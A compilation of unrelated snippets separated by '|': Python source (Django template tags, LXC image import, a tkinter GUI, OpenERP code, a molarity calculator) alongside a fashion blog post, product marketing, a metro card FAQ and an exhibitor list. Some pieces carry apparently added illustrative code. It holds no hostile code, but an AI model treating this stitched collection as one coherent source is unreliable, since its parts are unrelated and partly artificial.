that ``grouper``. In this case, ``grouper`` would be ``Male``, ``Female``
and ``Unknown``, and ``list`` is the list of people with those genders.
Note that ``{% regroup %}`` does not work when the list to be grouped is not
sorted by the key you are grouping by! This means that if your list of
people was not sorted by gender, you'd need to make sure it is sorted
before using it, i.e.::
{% regroup people|dictsort:"gender" by gender as grouped %}
"""
firstbits = token.contents.split(None, 3)
if len(firstbits) != 4:
raise TemplateSyntaxError, "'regroup' tag takes five arguments"
target = parser.compile_filter(firstbits[1])
if firstbits[2] != 'by':
raise TemplateSyntaxError("second argument to 'regroup' tag must be 'by'")
lastbits_reversed = firstbits[3][::-1].split(None, 2)
if lastbits_reversed[1][::-1] != 'as':
raise TemplateSyntaxError("next-to-last argument to 'regroup' tag must"
" be 'as'")
expression = parser.compile_filter(lastbits_reversed[2][::-1])
var_name = lastbits_reversed[0][::-1]
return RegroupNode(target, expression, var_name)
regroup = register.tag(regroup)
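``RegroupNode.render`` is a thin wrapper around ``itertools.groupby``; the grouped structure it builds can be reproduced directly on a pre-sorted list (sample data invented for illustration):

```python
from itertools import groupby

# Group a pre-sorted list by a key, producing the same
# {'grouper': ..., 'list': [...]} shape the regroup tag builds.
people = [
    {'name': 'George', 'gender': 'Male'},
    {'name': 'Bill', 'gender': 'Male'},
    {'name': 'Margaret', 'gender': 'Female'},
]
grouped = [
    {'grouper': key, 'list': list(items)}
    for key, items in groupby(people, key=lambda p: p['gender'])
]
```

As the regroup docstring warns, an unsorted input would produce one group per run of equal keys rather than one group per distinct key.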
def spaceless(parser, token):
"""
Removes whitespace between HTML tags, including tab and newline characters.
Example usage::
{% spaceless %}
<p>
<a href="foo/">Foo</a>
</p>
{% endspaceless %}
This example would return this HTML::
<p><a href="foo/">Foo</a></p>
Only space between *tags* is normalized -- not space between tags and text.
In this example, the space around ``Hello`` won't be stripped::
{% spaceless %}
<strong>
Hello
</strong>
{% endspaceless %}
"""
nodelist = parser.parse(('endspaceless',))
parser.delete_first_token()
return SpacelessNode(nodelist)
spaceless = register.tag(spaceless)
#@register.tag
def templatetag(parser, token):
"""
Outputs one of the bits used to compose template tags.
Since the template system has no concept of "escaping", to display one of
the bits used in template tags, you must use the ``{% templatetag %}`` tag.
The argument tells which template bit to output:
================== =======
Argument Outputs
================== =======
``openblock`` ``{%``
``closeblock`` ``%}``
``openvariable`` ``{{``
``closevariable`` ``}}``
``openbrace`` ``{``
``closebrace`` ``}``
``opencomment`` ``{#``
``closecomment`` ``#}``
================== =======
"""
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError, "'templatetag' statement takes one argument"
tag = bits[1]
if tag not in TemplateTagNode.mapping:
raise TemplateSyntaxError("Invalid templatetag argument: '%s'."
" Must be one of: %s" %
(tag, TemplateTagNode.mapping.keys()))
return TemplateTagNode(tag)
templatetag = register.tag(templatetag)
def url(parser, token):
"""
Returns an absolute URL matching given view with its parameters.
This is a way to define links that aren't tied to a particular URL
configuration::
{% url path.to.some_view arg1,arg2,name1=value1 %}
The first argument is a path to a view. It can be an absolute python path
or just ``app_name.view_name`` without the project name if the view is
located inside the project. Other arguments are comma-separated values
that will be filled in place of positional and keyword arguments in the
URL. All arguments for the URL should be present.
For example if you have a view ``app_name.client`` taking client's id and
the corresponding line in a URLconf looks like this::
('^client/(\d+)/$', 'app_name.client')
and this app's URLconf is included into the project's URLconf under some
path::
('^clients/', include('project_name.app_name.urls'))
then in a template you can create a link for a certain client like this::
{% url app_name.client client.id %}
The URL will look like ``/clients/client/123/``.
"""
bits = token.contents.split(' ', 2)
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % bits[0])
args = []
kwargs = {}
if len(bits) > 2:
for arg in bits[2].split(','):
if '=' in arg:
k, v = arg.split('=', 1)
k = k.strip()
kwargs[k] = parser.compile_filter(v)
else:
args.append(parser.compile_filter(arg))
return URLNode(bits[1], args, kwargs)
url = register.tag(url)
#@register.tag
def widthratio(parser, token):
"""
For creating bar charts and such, this tag calculates the ratio of a given
value to a maximum value, and then applies that ratio to a constant.
For example::
<img src='bar.gif' height='10' width='{% widthratio this_value max_value 100 %}' />
Above, if ``this_value`` is 175 and ``max_value`` is 200, the image in
the above example will be 88 pixels wide (because 175/200 = .875;
.875 * 100 = 87.5 which is rounded up to 88).
"""
bits = token.contents.split()
if len(bits) != 4:
raise TemplateSyntaxError("widthratio takes three arguments")
tag, this_value_expr, max_value_expr, max_width = bits
try:
max_width = int(max_width)
except ValueError:
raise TemplateSyntaxError("widthratio final argument must be an integer")
return WidthRatioNode(parser.compile_filter(this_value_expr),
parser.compile_filter(max_value_expr), max_width)
widthratio = register.tag(widthratio)
#@register.tag
def do_with(parser, token):
"""
Adds a value to the context (inside of this block) for caching and easy
access.
For example::
{% with person.some_sql_method as total %}
{{ total }} object{{ total|pluralize }}
{% endwith %}
"""
bits = list(token.split_contents())
if len(bits) != 4 or bits[2] != "as":
raise TemplateSyntaxError("%r expected format is 'value as name'" %
bits[0])
var = parser.compile_filter(bits[1])
name = bits[3]
nodelist = parser.parse(('endwith',))
parser.delete_first_token()
return WithNode(var, name, nodelist)
do_with = register.tag('with', do_with)
|
Hello all! Here is the latest Style Crush post, featuring Florence Welch. I’ve chosen this look as I think it is very typical of her and, me being me, I love all the vintage inspired pieces she wears. This look is probably like Marmite. You will either love it or hate it. I am in the ‘Love’ half of the audience and I think she pulls it off brilliantly. The only thing that I’m not too keen on is her hair. I normally love her red flowing locks, but this to me personally is a little too orange, and the style is very ageing on her. However, that’s not what we’re here to admire, so onto the outfit!
I really like the clashing prints of paisley and vintage check, and the attention to detail, such as the lace trim of the skirt, the suspender tights and the trilby hat. Everything just seems to work in a weird way.
Here is my take on the outfit. I couldn’t find a suitable printed cardigan that I felt resembled Florence’s, so I’ve gone for a simple shrug in a similar shade.
The items pictured were found at Topshop, New Look, Urban Outfitters, Rokit, Miss Selfridge and Topman.
What do you think of Florence’s style?
I’ll be back tomorrow with some photos from a recent shoot I styled.
yay thanks for doing this post i love it!
I love this outfit on Florence, she pulls it off like no one else could!
|
import os.path
import os
from document import *
from module import *
def moduledir():
return os.path.dirname(os.path.abspath(__file__))
hidden = Marker("hidden")
# Modules: ( name, marker, [ (marker,[insert before marker,...] ), (marker,...), ...] )
jsm = Marker("js")
# Modules: ( name, marker, [ (marker,[insert before marker,...] ), (marker,...), ...] )
jsModule = Module("js",jsm,[("head",["<script language='JavaScript'> /* <![CDATA[ */\n",jsm,"//]]>\n</script>\n"]) ])
AnOlderToggleShowImpl = """
function toggleShow(itemId){
var ctnt = document.getElementById(itemId);
var curStyle = ctnt.getAttribute("style");
if (curStyle == 'display: none;') {
ctnt.setAttribute("style",ctnt.getAttribute("origstyle"));
}
else {
ctnt.setAttribute("origstyle",ctnt.getAttribute("style"));
ctnt.setAttribute("style","display: none;");
}
}
"""
showHideModule = Module("showhide",hidden, [("js",["""function toggleShow(itemId) {
var ctnt = document.getElementById(itemId);
if ((ctnt.style.display == "none") || (ctnt.style.display == "")) {
if (ctnt.getAttribute("actualdisplay"))
ctnt.style.display = ctnt.getAttribute("actualdisplay");
else
ctnt.style.display = "block";
}
else {
ctnt.setAttribute("actualdisplay",ctnt.style.display);
ctnt.style.display = "none";
}
}
function SwapContent(contentId, toId, hideId){
var ctnt = document.getElementById(contentId);
var hide = document.getElementById(hideId) ;
var tgt = document.getElementById(toId);
// childNodes is a live NodeList, so iterating it by index while moving
// nodes skips every other child; move nodes from the front instead.
while (tgt.firstChild) {
hide.appendChild(tgt.firstChild);
}
tgt.appendChild(ctnt);
}
function MoveContent(contentId,toId){
var ctnt = document.getElementById(contentId);
var tgt = document.getElementById(toId);
tgt.appendChild(ctnt);
}
function CopyContent(contentId,toId,remExisting){
var ctnt = document.getElementById(contentId);
var tgt = document.getElementById(toId);
var copy = ctnt.cloneNode(true);
copy.removeAttribute('id');
if (remExisting) while( tgt.hasChildNodes() ) { tgt.removeChild( tgt.lastChild ); }
tgt.appendChild(copy);
}
"""] ),
("style",["#hidden { display:none }\n"]),("body",["<div id='hidden'>",hidden,"</div>"]) ])
# ("style",["#hidden { position:absolute; bottom:0px ; right:0px ; height:1px ; width:1px ; z-index:-10000 ; overflow:hidden; clip:auto }\n"]),("body",["<div id='hidden'>",hidden,"</div>"]) ])
delayLoadModule = Module("delayLoad",None,[("js",["""
function delayLoadImg(imId,href){
var img = document.getElementById(imId);
img.src = href;
}
"""])])
faderModule = Module("fader",None,[("js",[open(os.path.join(moduledir(),"fader.js"),"r").read()])])
""" Example use of styleRow
<tr>
<td>
<div onClick="styleRow(this,'background-color:red')">
New
</div>
</td>
</tr>
"""
styleRowModule = Module("styleRow",None,[("js",["""
function styleRow(elemInRow,newStyle){
var row = elemInRow;
while ((row != document)&&(row.tagName != "TR")) { row = row.parentNode; }
if (row != document) row.setAttribute('style', newStyle);
}
"""])])
newRowModule = Module("newRow",None,[("js",["""
function newRow(anyElemInTable,budId){
var table = anyElemInTable;
while ((table != document)&&(table.tagName != "TABLE")) { table = table.parentNode; }
if (table != document) {
var copy = document.getElementById(budId).cloneNode(true);
copy.removeAttribute('id');
table.appendChild(copy);
}
}
"""])])
""" Example use of makeEditable: note I have to removeAttribute('onClick'), or when you click to edit it will make another.
<form>
<table><tr>
<td onClick="this.removeAttribute('onClick'); makeEditable(this,'textbox1')">
New Hampshire
</td>
</tr>
</table>
<input id='textbox1' name="Start" type="text" value="Start" />
</form>
"""
makeEditableModule = Module("makeEditable",None,[("js",[r"""
function makeEditable(elem,editBoxBudId, newId){
var newEditBox = document.getElementById(editBoxBudId).cloneNode(true);
var data = elem.firstChild.data;
var i=0;
while ((data[i] == ' ')||(data[i] == '\n')) i++; /* Wipe preceding whitespace */
data = data.substring(i,data.length);
newEditBox.setAttribute('value',data);
if (newId != "") newEditBox.setAttribute('id',newId);
newEditBox.setAttribute('name',newId);
elem.replaceChild(newEditBox, elem.firstChild);
newEditBox.focus();
}
"""])])
# styleRow(anyElemInTable,'background-color:blue')
|
Mediscript publishes an extensive range of medical/scientific publications for a wide spectrum of readership ranging from clinical and basic research scientists to consultants, general practitioners, pharmacists, medical representatives, nurses and patients. Over the last 30 years, our publications have covered a vast array of therapeutic fields, including oncology, virology, dermatology, HIV, hepatitis, respiratory medicine, cardiovascular disease, diabetes, gastroenterology, obesity, sports medicine, health and fitness. The company has established worldwide contacts throughout academia and medicine in all fields, particularly HIV disease.
Our services include writing, editing, literature scanning, abstracting, design, typesetting, artwork, print and production, translation and transcribing, conference planning, international freight and shipping and fulfilment of mailing lists, UK and worldwide. We work closely with a team of IT specialists for the design, construction and management of websites. Mediscript publications include journals, training programmes, product monographs, conference literature, newsletters, treatment guidelines and patient education material in a range of therapeutic conditions.
The company also has considerable experience in the organisation of conferences ranging from small Roundtables to satellite symposia and larger events of up to 1000 delegates. As an extension of our activities, we have worked with medical associations and learned societies and played a pivotal role in the setting up of the British HIV Association (BHIVA), the National HIV Nurses Association (NHIVNA) and the Children's HIV Association (CHIVA).
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import logging
import subprocess
from edi.commands.lxc import Lxc
from edi.commands.imagecommands.imagelxc import Lxc as LxcImageCommand
from edi.lib.shellhelpers import run
from edi.lib.helpers import print_success
class Import(Lxc):
@classmethod
def advertise(cls, subparsers):
help_text = "import an edi image into the LXD image store"
description_text = "Import an edi image into the LXD image store."
parser = subparsers.add_parser(cls._get_short_command_name(),
help=help_text,
description=description_text)
cls._require_config_file(parser)
def run_cli(self, cli_args):
self.run(cli_args.config_file)
def run(self, config_file):
self._setup_parser(config_file)
if self._is_in_image_store():
logging.info(("{0} is already in image store. "
"Delete it to regenerate it."
).format(self._result()))
return self._result()
image = LxcImageCommand().run(config_file)
print("Going to import lxc image into image store.")
self._import_image(image)
print_success("Imported lxc image into image store as {}.".format(self._result()))
return self._result()
def clean(self, config_file):
self._setup_parser(config_file)
if self._is_in_image_store():
logging.info(("Removing '{}' from image store."
).format(self._result()))
self._delete_image()
print_success("Removed {} from image store.".format(self._result()))
def _result(self):
return "{}_{}".format(self.config.get_project_name(),
self._get_command_file_name_prefix())
def _is_in_image_store(self):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("show")
cmd.append("local:{}".format(self._result()))
result = run(cmd, check=False, stderr=subprocess.PIPE)
return result.returncode == 0
def _import_image(self, image):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("import")
cmd.append(image)
cmd.append("local:")
cmd.extend(["--alias", self._result()])
run(cmd)
def _delete_image(self):
cmd = []
cmd.append("lxc")
cmd.append("image")
cmd.append("delete")
cmd.append("local:{}".format(self._result()))
run(cmd)
|
What is the threshold limit of Unifare Bangalore Metro Platinum Debit Cards?
The threshold limit is the balance amount (on the Namma Metro Transit Chip) at which the auto recharge instruction will be executed automatically. The threshold limit is Rs. 100 i.e. when the balance on the Namma Metro Transit Chip drops below Rs. 100, the auto recharge of Rs. 200 will be credited to the Namma Metro Transit Chip after automatic deduction from the Bank Account.
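The threshold logic above can be sketched as simple balance arithmetic (a hypothetical illustration only; the function and variable names are invented and do not reflect the bank's actual system):

```python
THRESHOLD = 100  # Rs.; auto recharge triggers when the chip balance drops below this
RECHARGE = 200   # Rs. credited to the transit chip per auto recharge

def settle_fare(chip_balance, account_balance, fare):
    """Deduct a fare from the chip, then auto-recharge if below the threshold."""
    chip_balance -= fare
    if chip_balance < THRESHOLD and account_balance >= RECHARGE:
        account_balance -= RECHARGE  # automatically deducted from the bank account
        chip_balance += RECHARGE     # credited to the Namma Metro Transit Chip
    return chip_balance, account_balance

# A Rs. 30 fare takes the chip from Rs. 120 to Rs. 90, triggering a recharge.
print(settle_fare(120, 1000, 30))  # (290, 800)
```

With a higher starting balance no recharge fires: `settle_fare(500, 1000, 30)` leaves the account untouched.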
|
'''
@author: Thomas
'''
# M = moles solute / liters
def calculateMolarity():
molesSolute = float(raw_input('How many moles of the solute do you have? '))
litersSolvent = float(raw_input('How many liters of the solvent do you have? '))
return molesSolute / litersSolvent
def calculateLiters():
molarity = float(raw_input('What is the molarity of the solution? '))
molesSolute = float(raw_input('How many moles are there dissolved in the solution? '))
return molesSolute / molarity
def calculateMoles():
molarity = float(raw_input('What is the molarity of the solution? '))
litersSolvent = float(raw_input('How many liters of the solvent do you have? '))
molesSolute = molarity * litersSolvent
return molesSolute
def setBool(a):
if a.lower() == 'y':
return True
else:
return False
def typeOfProblem():
molesCheck = raw_input('Do you know the amount of moles in the solution?(y/n) ')
litersCheck = raw_input('Do you know the amount of liters in the solution?(y/n) ')
molesCheck = setBool(molesCheck)
litersCheck = setBool(litersCheck)
if molesCheck and litersCheck:
print "M = " + str(calculateMolarity())
elif molesCheck and not litersCheck:
print str(calculateLiters()) + " L"
else:
print str(calculateMoles()) + " mol"
if __name__ == "__main__":
while True:
typeOfProblem()
option = raw_input('Do you need to solve another problem?(y/n) ')
if option.lower() == "y":
continue
else:
break
|
Operational business decisions are high-volume transactions that are repeated many times a day. They have high potential for automation and exert a strong leverage effect on efficiency. ACTICO Platform enables companies to implement agile services and applications to automate decisions or improve human decision-making.
Operational decisions are omnipresent – whether it’s evaluating risks, recommending products, calculating prices or controlling business processes. Digital business is heavily decision-centric and requires companies to make even the most complex of decisions instantly, transparently and consistently across all channels. ACTICO Platform enables companies to implement powerful digital decisioning services and applications. Whether it’s fully automated decisions based on AI and rules or workflow-based case-by-case decisions – ACTICO Platform ensures your decisions are smart, precise and traceable.
Business decisions need to be clear, accurate and adaptable. ACTICO Platform provides users with a drag-&-drop editor to create DMN decision models, define business rules and embed machine learning models wherever it makes sense. This low-code development approach brings more autonomy to business users and enables them to adapt quickly to changing requirements.
ACTICO’s digital decisioning platform uses AI to generate data-driven insights and apply them directly to operational decision-making. Powerful machine learning technology and advanced algorithms ensure accurate and rapid results. The trained ML models can be graphically embedded into decision and rule models. This visual approach offers maximum transparency, control and agility.
With ACTICO Platform, companies can automatically make decisions in any business process, application or channel. Decisions can be provided as reusable web services that can be consumed by any system. Changes are possible at any time without programming and without having to wait for the next IT release. ACTICO’s decision engine can also be integrated directly into applications to meet the most demanding of performance requirements.
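The idea of a reusable decision service decoupled from application code can be sketched as rules-as-data evaluated by a tiny engine (a hypothetical illustration only; ACTICO's actual decision models are built graphically, and the rule conditions and names here are invented):

```python
# Each rule is (condition, outcome); rules are evaluated in order, first match wins.
# Because the rules are plain data, they can be changed without touching the
# applications that call decide() -- the point of a central decision service.
CREDIT_RULES = [
    (lambda a: a["score"] >= 700 and a["income"] >= 50000, "approve"),
    (lambda a: a["score"] >= 600, "manual_review"),
    (lambda a: True, "decline"),  # fallback rule
]

def decide(applicant, rules=CREDIT_RULES):
    """Evaluate the rules in order and return the first matching outcome."""
    for condition, outcome in rules:
        if condition(applicant):
            return outcome

print(decide({"score": 720, "income": 60000}))  # approve
print(decide({"score": 640, "income": 30000}))  # manual_review
```

Exposing `decide` behind a web endpoint would let any process, application or channel consume the same decision logic.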
Not all decisions can be fully automated. Some decisions require additional information or human judgement. ACTICO Platform enables companies to implement workflow-based web applications for case-by-case decision making. ACTICO’s integrated development approach ensures that each aspect of the web application can be changed quickly whenever needed.
Decisions are a key lever for profitability and set companies apart from the competition. Digital decisioning allows businesses to implement individual applications that automatically make decisions based on the next best action.
With the centralized digital decisioning approach, companies implement a "single point of truth". This is where decisions are consistently managed, improved and made available as reusable decision services across all IT systems.
Digital decisioning decouples operational decisions from processes and applications. This means it is possible to make changes to decision-making in the blink of an eye – without coding and independent of IT release cycles.
Central decision services take agility and consistency to a new level.
Our customers have built and implemented numerous applications based on our decision management software – Learn more!
UBS Hong Kong checks up to 100,000 transactions per minute. This major bank implemented its powerful compliance application in the space of just 6 months. Now it is perfectly placed to adapt to new requirements as needed.
In today’s digital world, customer requirements change rapidly in accordance with their current situation. ING relies on ACTICO Platform to create personalized customer communications that reflect this context.
Bajaj Finance uses ACTICO software as its central credit decisioning platform. The software is seamlessly integrated with surrounding systems and empowers business users to take ownership of business logic.
Discover ACTICO Platform and get started with digital decisioning.
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from os.path import expanduser
from propresenterconverter import propresenterconverter
class directoryconversiongui:
def __init__(self):
# Create the gui.
self.window = Tk()
self.window.title("Directory Converter")
# Set the variables.
self.inputdirectory = StringVar(value="")
self.outputdirectory = StringVar(value="")
# Add the variables.
self.mainframe = ttk.Frame(self.window, padding="3 3 12 12")
self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
self.mainframe.columnconfigure(0, weight=1)
self.mainframe.rowconfigure(0, weight=1)
# Create each widget first and call grid() separately: grid() returns None,
# so chaining it would store None in these attributes instead of the widgets.
self.inputdirbutton = ttk.Button(self.mainframe, text="Input Directory", command=self.inputdirbutton_click)
self.inputdirbutton.grid(column=1, row=1, sticky=(W, E))
self.outputdirbutton = ttk.Button(self.mainframe, text="Output Directory", command=self.outputdirbutton_click)
self.outputdirbutton.grid(column=1, row=2, sticky=(W, E))
self.processbutton = ttk.Button(self.mainframe, text="Convert!", command=self.processbutton_click)
self.processbutton.grid(column=1, row=3, sticky=(W, E))
self.inputdirlabel = ttk.Label(self.mainframe, textvariable=self.inputdirectory)
self.inputdirlabel.grid(column=2, columnspan=2, row=1, sticky=(W, E))
self.outputdirlabel = ttk.Label(self.mainframe, textvariable=self.outputdirectory)
self.outputdirlabel.grid(column=2, columnspan=2, row=2, sticky=(W, E))
# Minimum width for the label.
self.mainframe.columnconfigure(2, minsize=200)
# Options for opening a directory.
self.dir_opt = options = {}
options['initialdir'] = expanduser("~")
options['mustexist'] = False
options['parent'] = self.mainframe
options['title'] = 'Choose Folder'
def inputdirbutton_click(self):
# Show the folder choice dialog.
self.dir_opt['title'] = 'Choose Input Directory'
inputdir = filedialog.askdirectory(**self.dir_opt)
if inputdir is None:
inputdir = ""
self.inputdirectory.set(inputdir)
self.mainframe.update_idletasks()
def outputdirbutton_click(self):
# Show the folder choice dialog.
self.dir_opt['title'] = 'Choose Output Directory'
outputdir = filedialog.askdirectory(**self.dir_opt)
if outputdir is None:
outputdir = ""
self.outputdirectory.set(outputdir)
self.mainframe.update_idletasks()
def processbutton_click(self):
# TODO - Run the conversion code with the appropriate arguments.
ppconv = propresenterconverter(arglist=['-inputdir', self.inputdirectory.get(), '-outputdir',
self.outputdirectory.get()])
ppconv.convert()
return
def show(self):
# Start running the main loop.
self.window.mainloop()
|
Take an early stroll through the aisles of the largest KM event ever produced.
80-20 Software's newest technology, Darwin, represents over 20 man-years of research in neural networks and pattern matching technologies at Telstra Research and Development Labs. The result is a suite of tools specifically designed for content tracking and analysis, as well as expertise location, combined with a portal to manage corporate knowledge.
Ariel Performance Centered Systems will demonstrate "Day One System Performance" services for the retail and hospitality markets, which is a product of its strategic business alliance with Cyntergy. These services will decrease software-support and implementation costs by making application user interfaces easier to learn and use. ROI on new system implementations is said to increase by decreasing training costs and time to competency.
Brainshark Enterprise is a communications application service provider that allows companies to self-author, deliver and manage on-demand multimedia business communications. Users can create and access recorded multimedia presentations anywhere, anytime to provide a scalable, flexible solution for knowledge transfer to multiple audiences.
Brightstation develops Web applications for business, including: InfoSort, which electronically reads documents and automatically assigns index categories by identifying key business topics, and Muscat, which finds information by understanding concepts underlying search requests using probabilistic methods to match concepts and ideas.
Computer Associates will introduce the Jasmine ii Portal, which uses 100% Java for scalability, interoperability, extensibility, platform independence and zero administration. It can be controlled from a central IT organization, thereby reducing administration costs and security risks. Jasmine ii can integrate with existing systems, automate common tasks and work with open directory services (e.g. LDAP).
Cerebyte will feature the latest enhancement of its Infinos software, a suite of 10 applications designed to apply the captured knowledge of business operations to generate more revenue and increase customer satisfaction without adding personnel. Cerebyte is also creating a business-to-business application service provider to enable 24/7 access to its software, road maps library and online services.
Comintell will show its Web technology to aggregate and deliver job-specific, in-context information and applications for particular user communities. The company was founded in 1999 by the former management team of Ericsson's business intelligence operations.
Communispace is a hosted ASP, Web-based environment that focuses on connecting people to people (not just people to documents) to achieve specific objectives, regardless of geographic, time and organizational barriers. A customizable service, Communispace offers brainstorming activities, threaded dialogue, conversation and collaboration, a research center, member profiles, multimedia exhibits, messaging and other features.
Correlate will offer a pre-release demonstration of Correlate 3.0, which turns the browser from a read-only environment into a collaborative, secured, XML-based information sharing platform and provides integration between the Web and other information sources. The Webmaster still controls publishing rights, but does not need to do manual work for documents because users can publish MS-Office documents directly from their desktops.
Portal B from Data Downlink offers a single point of access to internal and external information sources--configurable to a company's individual needs. The package integrates business Web searching, customized directories, premium content and indexed access to an enterprise's published material. It features a custom collection of more than 8,500 content-rich Internet sites that have been hand-selected and reviewed.
InfoImage, a developer of decision portal software, will show interoperability of Microsoft Web Parts with its freedom 2 decision portal software at KMWorld 2000. Web Parts is a common technology that enables enterprise portals from different companies to talk to one another. InfoImage freedom 2 allows content and applications to be delivered as Web Parts to integrate directly with personalization and analysis features.
Work2gether is KM Technologies' intranet application designed for medium-sized companies (from 50 to 1,000 employees). Distributed through ASPs and ISPs, as well as through value-added resellers, Work2gether is not dependent on the company's language of work, position or geographical location.
MindCrest's knowledge portal, eWise, allows companies to leverage knowledge assets, particularly management of tacit knowledge, in a comprehensive manner. MindCrest also provides business and technical consulting and implementation services, integrated with a learning management system for KM implementation.
Knowledge Management 2.0 from Net Perceptions is designed to integrate applications and environments, such as browsers and other frequently used applications, into employees' existing work habits. New features include actionable intelligence, shared knowledge collections and personal knowledge networks.
Northern Light presents a growing number of B2B products and services ranging from enterprise accounts to customized business portals that provide seamless access from the user's desktop to the Web, relevant internal content, licensed third-party content and the Northern Light Special Collection.
Nua will launch Nua Publish, a Web-based publishing tool to enable enterprises to create, publish and scale better content online, to search more effectively online and to better manage its business information.
Peer3 will be offering e-learning and knowledge portal software and related services. The software is structured to reduce the time and cost of developing training courses and provide adaptive, personalized learning. It enables users to create and reuse "learning objects" that can be integrated into multiple training programs with minimal effort.
Semio will demonstrate Taxonomy 4.0, a complete service for building and maintaining customized, browseable categories for corporate portals and Internet sites. 4.0 features a new user interface, relevance ranking, Documentum access and multiple language support.
Sharing Technologies will present its flagship Knowledge Sharing software solution, Papirus for Domino. Papirus enables information to be shared easily and effectively. Papirus captures information, using the print function, from any Windows-based application (Excel, PeopleSoft, CAD/CAM, etc.) into a Notes document.
Silicon Space provides integrated e-business program management, including strategy, design, Web development, e-marketing and support of Internet, intranet and extranet solutions.
Smartlogik will unveil its latest generation of natural language search and categorization software for Internet and intranet applications. The Smartlogik software suite comprises searching, indexing, alerting, structuring, rule building and rule editing components. Used individually or in combination, the software is designed to increase the efficiency of knowledge retrieval.
Solutions-united.com will be launching the metaMarker Customer Content (CC) module, an "add-in" technology for use with metaMarker, its core technology platform, in CRM solutions. MetaMarker CC 1.0, features an expanded metadata framework, descriptive features, additional situation or use aspects and the Meta-Multiplier engine.
Sopheon presents modular software products designed to manage and leverage the knowledge life cycle for e-business from creation and capture to publishing via a variety of means, including portals, the Internet and alternative devices. The components can be selected for individual capability or delivered as a complete solution to fit organization requirements. The components include Sopheon Modeler, Terms, Composer, Publisher and Agents.
Synergistics will be previewing Authoriti, its new business portal that enables companies to develop knowledge communities. Authoriti manages enterprise knowledge and content and integrates it with relevant external information.
Tacit Knowledge Systems will showcase KnowledgeMail, an automatic discovery and exchange knowledge asset. KnowledgeMail provides the entire enterprise access to public, private and tacit knowledge while preserving user control and privacy at all times.
Thinkmap will announce the launch of Thinkmap Studio, a platform for creating interfaces for displaying, animating and navigating complex and interconnected information. In conjunction with the Thinkmap Studio launch, the company will announce several key strategic partnerships and showcase the latest knowledge management applications it powers.
VisionCompass is an international supplier of collaborative enterprise management software that enables organizations to implement and manage complex, interrelated business objectives. The Web-enabled, client-server software system features collaboration, communication, tracking, analysis and business intelligence functionality for organizations to deliver a set of business initiatives at all organizational levels.
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
class res_company(osv.osv):
_inherit = "res.company"
_description = 'Company'
    def _get_default_ad(self, addresses):
        name = email = phone = city = post_code = address = country_code = ""
        for ads in addresses:
            if ads.type == 'default':
                city = ads.city or ""
                post_code = ads.zip or ""
                if ads.street:
                    address = ads.street
                if ads.street2:
                    address += " " + ads.street2
                if ads.country_id:
                    country_code = ads.country_id.code or ""
                name = ads.name or ""
                email = ads.email or ""
                phone = ads.phone or ""
        return name, email, phone, city, post_code, address, country_code
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
We are glad to announce the launch of our new 30W USB PD charger.
With USB Power Delivery, you can distribute power to multiple devices.
It is designed for smartphones, tablets, and compact electronic accessories with a USB Type-C port.
|
'''
import sys
sys.path.append('..')
'''
from master_utils import *
import numpy as np
import os
import MySQLdb
from lda import LDA
from sklearn.decomposition import LatentDirichletAllocation
import datetime
import lda_t1
class BugEvent:
def __init__(self, start, end, topic, id, final):
self.start_date = start
self.end_date = end
self.bug_id = id
self.final_fixer = final
class TossingItem:
def __init__(self, time, user):
self.sq_timestamp = time
self.sq_user = user
self.time_passed = 0 #in seconds
def ComputeTime(self, prev_tossing):
time_n = datetime.datetime.fromtimestamp(float(self.sq_timestamp))
time_p = datetime.datetime.fromtimestamp(float(prev_tossing.sq_timestamp))
length = time_n - time_p
self.time_passed = length.total_seconds()
def __str__(self):
s = self.sq_timestamp + '##' + self.sq_user + '##' + str(self.time_passed) + '#;;#'
return s
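As a standalone sketch, `ComputeTime` boils down to subtracting two `datetime` objects built from UNIX timestamps (the timestamp values below are made up):

```python
import datetime

# Illustrative timestamps one hour apart, stored as strings the way the
# tossing data keeps them.
t_prev = "1600000000"
t_next = "1600003600"
delta = (datetime.datetime.fromtimestamp(float(t_next))
         - datetime.datetime.fromtimestamp(float(t_prev)))
print(delta.total_seconds())  # 3600.0
```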
|
This year we celebrate Halloween with ‘Deadly Blessing’, our first film to kick off the week.
A young woman’s fiancé is murdered, and she is pursued by unknown forces. She suspects that the strange religious cult he was a member of, the Hittites, is to blame.
Tags: deadly blessings, horror, and wes craven.
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Creates a .tar.gz file containing an HTML treemap displaying the codesize.
Requires docker to be installed.
Example usage:
python make_treemap.py $SKIA_ROOT/out/Release/skottie_tool /tmp/size
"""
import os
import subprocess
import sys
import tempfile
DOCKER_IMAGE = 'gcr.io/skia-public/binary-size:v1'
DOCKER_SCRIPT = '/opt/binary_size/src/run_binary_size_analysis.py'
def main():
input_file = sys.argv[1]
out_dir = sys.argv[2]
input_base = os.path.basename(input_file)
input_dir = os.path.dirname(input_file)
temp_out = tempfile.mkdtemp('treemap')
